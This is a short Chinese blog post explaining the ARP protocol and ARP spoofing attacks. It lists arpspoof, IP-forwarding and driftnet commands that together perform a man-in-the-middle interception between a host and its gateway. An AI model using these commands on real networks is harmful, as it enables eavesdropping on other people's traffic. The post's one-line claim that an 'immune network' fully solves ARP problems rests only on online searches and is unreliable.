ARP（Address Resolution Protocol，地址解析协议）是一个位于TCP/IP协议栈中的网络层，负责将某个IP地址解析成对应的MAC地址。

         ARP协议的基本功能就是通过目标设备的IP地址，查询目标设备的MAC地址，以保证通信的进行。

   ARP攻击的局限性

   ARP攻击仅能在以太网（局域网如：机房、内网、公司网络等）进行无法对外网（互联网、非本区域内的局域网）进行攻击。

          ARP攻击就是通过伪造IP地址和MAC地址实现ARP欺骗，能够在网络中产生大量的ARP通信量使网络阻塞，攻击者只要持续不断的发出伪造的ARP响应包就能更改目标主机ARP缓存中的IP-MAC条目，造成网络中断或中间人攻击。

 arpspoof -i eth0 -t 172.28.15.4 172.28.15.254

 echo 1 > /proc/sys/net/ipv4/ip_forward

 driftnet

 arpspoof -i eth0 -t 172.28.15.254 172.28.15.4

根据网上查询，免疫网络具有强大的网络基础安全和管理功能，免疫网络确实真正解决了困扰已久的ARP问题，技术上是严谨的，应用上是可行的，成本也是相对低廉。

本文出自 “12034852” 博客，谢绝转载！

arp的攻击和防御